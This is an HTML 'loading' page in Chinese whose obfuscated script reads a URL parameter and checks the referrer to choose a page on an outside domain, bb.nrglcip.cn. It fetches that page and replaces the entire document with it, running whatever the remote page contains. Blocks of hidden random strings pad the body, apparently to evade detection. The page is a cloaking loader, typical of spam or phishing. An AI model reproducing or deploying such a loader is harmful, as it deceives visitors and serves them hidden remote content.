<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .eshilSXV17 {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .eshilSXV17 .X90xu5Ztk {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .eshilSXV17 .content {
            line-height: 50px;
            text-align: center
        }

        .eshilSXV17 .img {
            width: 100%
        }

        .eshilSXV17 .iqQGh93IY {
            text-align: center
        }

        .eshilSXV17 .iqQGh93IY span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .eshilSXV17 .iqQGh93IY span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .eshilSXV17 .iqQGh93IY span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .eshilSXV17 .iqQGh93IY span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .eshilSXV17 .iqQGh93IY span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .eshilSXV17 .iqQGh93IY span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .eshilSXV17 .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function KFQbBjov2Bd(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var mcV6wki = KFQbBjov2Bd('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ mcV6wki +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ mcV6wki +".html?a=share";
		}
		
        tjfysG8=url+"#"+new Date().getTime();
        tjfysG8 && function() {
            $.get(tjfysG8, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<span style='display:none'>IL2EPlefB4DtqLXEQWMAKx0R2BOhPP0qRuxiY51c4f3G9IcSB9cQLfDeVo0dCLa0xroTIfNKZPRJEk8qM9OTI5oSeNT9</span>
<b style='display:none' >gUArZ507bXQWhIGMYn</b>
<div style='display:none'>Xw2wABUO0KjHPAj370BrGtuMS9J2lc</div>
<b style='display:none' >gUArZ507bXQWhIGMYn</b>
<img  src='' style='display:none'>
<div style='display:none'>Xw2wABUO0KjHPAj370BrGtuMS9J2lc</div>
<a  href='#' style='display:none'>hMdTA0MXg0Cg73qFV68bK9ARpUAoXTPaYrjikZ</a>
<b style='display:none' >gUArZ507bXQWhIGMYn</b>
<span style='display:none'>IL2EPlefB4DtqLXEQWMAKx0R2BOhPP0qRuxiY51c4f3G9IcSB9cQLfDeVo0dCLa0xroTIfNKZPRJEk8qM9OTI5oSeNT9</span><div class="eshilSXV17">
    <div class="X90xu5Ztk">
        <div class="iqQGh93IY">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<a  href='#' style='display:none'>SeZrBUGHQSRR292mui1zcy3pg</a>
<div style='display:none'>pLxNeY8XIkAntXIaY223qAOXOWdeK2F8qask7pP2qzJX34jDksjTBxQZPPzUXEg29POiEbhILk6LEnHIXMN</div>
<ul style='display:none' >QcLs3Qe3Ilz5Kkcc6xPGBbmjQ</ul>
<span style='display:none'>XcqhO3gadnn33a6fvOOXUv34xiqXhlyCWVEA1WBD</span>
<ul style='display:none' >QcLs3Qe3Ilz5Kkcc6xPGBbmjQ</ul>
<span style='display:none'>XcqhO3gadnn33a6fvOOXUv34xiqXhlyCWVEA1WBD</span>
<h1 style='display:none' >LqYm3XnfxnUjZ</h1>
<b style='display:none' >DWNAVc06m4a0zsxcPpFq8P3UMBjtzMlZv5eHwMYyBREa2cRP7IxGb5T3Kh8YHUPODjqsOLrhJ9Ez</b>
<b style='display:none' >DWNAVc06m4a0zsxcPpFq8P3UMBjtzMlZv5eHwMYyBREa2cRP7IxGb5T3Kh8YHUPODjqsOLrhJ9Ez</b></body>
</html>